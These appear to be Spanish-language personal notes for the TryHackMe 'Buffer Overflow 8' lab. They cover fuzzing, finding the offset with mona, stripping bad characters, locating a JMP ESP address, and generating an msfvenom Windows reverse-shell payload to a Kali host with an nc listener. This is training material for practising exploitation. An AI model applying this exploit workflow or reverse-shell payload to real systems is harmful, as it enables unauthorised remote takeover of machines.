
TryHackMe Buffer Overflow8
Linux
python fuzzer.py
)
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2200 o se puede usar esto msf-pattern_create -l 2200
)
Reiniciar app python3 exploit.py
!mona findmsp -distance 2200
)
Ahora cambiamos el offset en el archivo de exploit.py al numero offset Y tambien rtn le ponemos un valor de “BBBB”
Reiniciar app
!mona bytearray -b “\x00”
chequear que bytearray.bin este generado en el folder de mona Reiniciar app
python3 bad_characters.py
)
Reiniciar app Pegar el output a payload python3 exploit.py
!mona compare -f C:\mona\oscp\bytearray.bin -a
)
escribimos los bad chars 00 1d 1e 2e 2f c7 c8 ee ef
Donde dice ESP le damos click derecho y Follow in Dump
)
Le quitamos el x1d del payload hasta llegar al ultimo bad_char
)
Ahora el bad char es: 2e 2f c7 c8 ee ef \x00\x1d
Donde dice ESP le damos click derecho y Follow in Dump
)
Le quitamos el x2e del payload hasta llegar al ultimo bad_char
)
Ahora el bad char es: c7 c8 ee ef \x00\x1d\x2e
Donde dice ESP le damos click derecho y Follow in Dump
)
Le quitamos el xc7 del payload hasta llegar al ultimo bad_char
)
Ahora el bad char es: ee ef \x00\x1d\x2e\xc7
Donde dice ESP le damos click derecho y Follow in Dump
)
Le quitamos el xee del payload hasta llegar al ultimo bad_char
)
Ahora el bad char es: ee ef \x00\x1d\x2e\xc7\xee
!mona jmp -r esp -cpb “\x00\x1d\x2e\xc7\xee”
)
Vamos a Window->Log Agarramos el numero # y despues lo escribos alreves por ejemplo 625011af seria \xaf\x11\x50\x62
)
cambiamos el rtn y iniciamos payload=” esto en exploit.py
msfvenom -p windows/shell_reverse_tcp LHOST=KALI_IP LPORT=4444 EXITFUNC=thread -b “\x00\x1d\x2e\xc7\xee” -f c
padding = “\x90” * 16 nc -lvnp 4444